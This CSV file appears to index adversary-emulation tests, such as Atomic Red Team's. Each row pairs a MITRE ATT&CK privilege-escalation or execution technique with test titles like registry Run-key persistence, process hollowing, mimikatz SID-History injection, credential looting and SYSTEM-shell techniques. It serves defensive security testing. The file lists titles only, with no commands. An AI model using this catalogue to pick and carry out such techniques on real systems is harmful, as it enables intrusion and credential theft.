privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
privilege-escalation,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
privilege-escalation,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
privilege-escalation,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
privilege-escalation,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
privilege-escalation,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
privilege-escalation,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
privilege-escalation,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
privilege-escalation,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
privilege-escalation,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
privilege-escalation,T1098,Account Manipulation,10,Domain Password Policy Check: Short Password,fc5f9414-bd67-4f5f-a08e-e5381e29cbd1,powershell
privilege-escalation,T1098,Account Manipulation,11,Domain Password Policy Check: No Number in Password,68190529-069b-4ffc-a942-919704158065,powershell
privilege-escalation,T1098,Account Manipulation,12,Domain Password Policy Check: No Special Character in Password,7d984ef2-2db2-4cec-b090-e637e1698f61,powershell
privilege-escalation,T1098,Account Manipulation,13,Domain Password Policy Check: No Uppercase Character in Password,b299c120-44a7-4d68-b8e2-8ba5a28511ec,powershell
privilege-escalation,T1098,Account Manipulation,14,Domain Password Policy Check: No Lowercase Character in Password,945da11e-977e-4dab-85d2-f394d03c5887,powershell
privilege-escalation,T1098,Account Manipulation,15,Domain Password Policy Check: Only Two Character Classes,784d1349-5a26-4d20-af5e-d6af53bae460,powershell
privilege-escalation,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
privilege-escalation,T1098,Account Manipulation,17,GCP - Delete Service Account Key,7ece1dea-49f1-4d62-bdcc-5801e3292510,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,4,Snake Malware Kernel Driver Comadmin,e5cb5564-cc7b-4050-86e8-f2d9eec1941f,powershell
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
privilege-escalation,T1546,Event Triggered Execution,5,Adding custom debugger for Windows Error Reporting,17d1a3cc-3373-495a-857a-e5dd005fb302,command_prompt
privilege-escalation,T1546,Event Triggered Execution,6,Load custom DLL on mstsc execution,2db7852e-5a32-4ec7-937f-f4e027881700,command_prompt
privilege-escalation,T1546,Event Triggered Execution,7,Persistence using automatic execution of custom DLL during RDP session,b7fc4c3f-fe6e-479a-ba27-ef91b88536e3,command_prompt
privilege-escalation,T1546,Event Triggered Execution,8,Persistence via ErrorHandler.cmd script execution,547a4736-dd1c-4b48-b4fe-e916190bb2e7,powershell
privilege-escalation,T1546,Event Triggered Execution,9,Persistence using STARTUP-PATH in MS-WORD,f0027655-25ef-47b0-acaf-3d83d106156c,command_prompt
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1055.015,Process Injection: ListPlanting,1,Process injection ListPlanting,4f3c7502-b111-4dfe-8a6e-529307891a59,powershell
privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Use PsExec to elevate to NT Authority\SYSTEM account,6904235f-0f55-4039-8aed-41c300ff7733,command_prompt
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,10,"Scheduled Task (""Ghost Task"") via Registry Key Manipulation",704333ca-cc12-4bcf-9916-101844881f54,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,11,Scheduled Task Persistence via CompMgmt.msc,8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,12,Scheduled Task Persistence via Eventviewer.msc,02124c37-767e-4b76-9383-c9fc366d9d4c,command_prompt
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,command_prompt
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
execution,T1129,Server Software Component,1,ESXi - Install a custom VIB on an ESXi host,7f843046-abf2-443f-b880-07a83cf968ec,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,1,JScript execution to gather local computer information via cscript,01d75adf-ca1b-4dd1-ac96-7c9550ad1035,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,2,JScript execution to gather local computer information via wscript,0709945e-4fec-4c49-9faf-c3c292a74484,command_prompt
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,User Execution: Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,User Execution: Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,User Execution: Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,User Execution: Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,User Execution: Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,User Execution: Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,User Execution: Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
execution,T1204.002,User Execution: Malicious File,13,Simulate Click-Fix via Downloaded BAT File,22386853-f68d-4b50-a362-de235127c443,powershell
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
execution,T1072,Software Deployment Tools,3,Deploy 7-Zip Using Chocolatey,2169e8b0-2ee7-44cb-8a6e-d816a5db7d8a,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
